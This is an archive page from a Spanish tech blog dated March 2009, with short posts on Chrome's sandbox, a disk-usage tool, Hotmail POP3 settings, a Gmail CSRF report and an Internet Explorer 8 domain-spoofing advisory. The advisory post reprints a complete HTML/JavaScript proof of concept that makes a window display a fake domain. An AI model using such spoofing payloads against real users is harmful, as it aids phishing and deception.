Archivos para 31 marzo 2009
Super Mario Bros en la vida real
Publicado marzo 31, 2009 Humor , Internet , Ocio , Otros , Vídeos , Web Deja un ComentarioGoogle Chrome es demasiado difícil de hackear
Publicado marzo 24, 2009 Actualidad , Google , Informática , Internet , Linux , Seguridad , Vulnerabilidades , Web , Web 2.0 , Windows Deja un Comentario
La virtud de los navegadores multiproceso esque al estar cada uno de los procesos aislados entre sí, no pueden afectarse los unos a los otros.
En el caso de Google Chrome se le añade, además, el hecho de que se ejecuten dentro de una sandbox, un entorno en el cual no tienen acceso a recursos externos y, por tanto, los problemas de seguridad no afectarán al resto de la máquina. Y esto ha quedado demostrado en el PWN2OWN.
Continuar leyendo ‘Google Chrome es demasiado difícil de hackear’
Check Your Disk! te indica qué es lo que está ocupando más espacio en el disco duro
Publicado marzo 13, 2009 Google , Hardware , Informática , Otros , Software , Windows Deja un Comentario
Check Your Disk! es una herramienta para Windows que puede analizar tu disco duro e informarte cómo está conformada la distribución de datos, para que puedas tener una idea de cuáles son las cosas que más espacio están ocupando.
La aplicación nos permite visualizar gráficamente cómo está ocupado el disco duro. Como podemos ver en la imagen que acompaña el artículo, se nos muestra un gráfico de torta separado por colores. En él encontraremos las carpetas que más información contienen.
Como usuario puedes analizar el disco duro completo o solamente alguna locación en especial, como por ejemplo Mis Documentos, Mi Música, u otras. Al hacer clic sobre alguna porción de la torta obtendrás más información, como por ejemplo cuales son los archivos que más espacio ocupan.
Check Your Disk! es una herramienta para Windows totalmente gratuita que no requiere instalación alguna. Sólo ejecuta el archivo .EXE y podrás obtener rápidamente un reporte de tu disco duro.
Enlace: Check Your Disk!
Vía: Bitelia.
Hotmail habilita el acceso POP3 desde cualquier parte del mundo
Publicado marzo 13, 2009 Actualidad , Google , Internet , Ocio , Otros , Telecomunicaciones , Web , Web 2.0 Deja un Comentario
Si recuerdan, en enero les comentábamos que Hotmail había habilitado el soporte POP3 para poder hacer consulta de tus correos desde cualquier cliente, sin embargo esto estaba limitado a Estados Unidos y algunos otros países. Hoy el equipo de Windows Live da el anuncio de que esta característica está disponible para todo el mundo.
Para que tu cliente reciba los mails de Hotmail es necesario que configures tu nueva cuenta con los siguientes datos:
POP server: pop3.live.com (Port 995)
¿POP SSL requerido? Sí
User name: Tu Windows Live ID, por ejemplo tunombre@hotmail.com
Password: La contraseña que usas para entrar a Hotmail o Windows Live
SMTP server: smtp.live.com (Port 25)
¿Servidor requiere autenticación? Sí
¿TLS/SSL requerido? Sí
Así que aquellos que usan Hotmail de ahora en adelante podrán sentirse liberados de tener que entrar al sitio de Hotmail para revisar sus mails. Por cierto, como dato curioso e irónico, he instalado el correo en mi cuenta de Gmail y funciona de maravilla.
Vía: Bitelia.
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoofing
Publicado marzo 6, 2009 Actualidad , Informática , Internet , Seguridad , Software , Vulnerabilidades , Web , Web 2.0 , Windows 12 Comentarios###########################################
IE8 beta RC1 res: / / Ieframe.dll / acr_error.htm Spoff
Vendedor: www.microsoft.com
Avisado por: http://lostmon.blogspot.com/2009/03/ie8-beta-c1-resieframedllacrerrorhtm.html
Notificado al vendedor: Sí Disponibilidad del exploit: Sí
############################################
Internet Explorer 8 tiene una vulnerabilidad que permite a los usuarios remotos spoofear el nombre del dominio en ‘Ieframe.dll‘ que se establece en el archivo ‘acr_error.htm‘ en res: URI es desde donde maneja cualquier usuario remoto pudiendo así crear una URL maligna que muestra el nombre de dominio, por ejemplo, “google.com“, (pero si clickamos en la url de google nos lleva a otros sítios, es lo llamado spoofing)
#################
Prueba del concepto
#################
<html>
<head>
<script type=”text/javascript”>
function open_win()
{
window.open(“res://ieframe.dll/acr_error.htm#http://www.google.com/,http://Lostmon.blogspot.com”,”_blank”,”toolbar=yes, location=no, directories=no, status=no, menubar=yes, scrollbars=no, resizable=no, copyhistory=no”);
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff -]:..</title>
<body>
<form>
<input type=”button” value=”Open Window” onclick=”open_win()”>
</form>
</body>
</html>
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team.
–
atentamente:
Lostmon (lostmon@gmail.com)
—————
thz Lost 
Vulnerabilidad en GMail permite cambiar la contraseña de acceso sin permiso alguno
Publicado marzo 5, 2009 Actualidad , Google , Informática , Internet , Seguridad , Vulnerabilidades , Web , Web 2.0 1 Comentario
Ni es la primera de este tipo ni tampoco me atrevo a llamarla nueva, porque al parecer Google fue informado en Agosto de 2007 de esta vulnerabilidad, que no ha solucionado porque le parece difícilmente explotable. El descubridor es un español (Vicente Aguilera, de ISecAuditors) que ha decidido publicar una descripción y prueba de concepto. Se trata de una vulnerabilidad del tipo CSRF, que permitiría a un atacante cambiar la contraseña de un usuario de Gmail sin su conocimiento.
http://seclists.org/fulldisclosure/2009/Mar/0029.html
Vía: menéame.
Comentarios recientes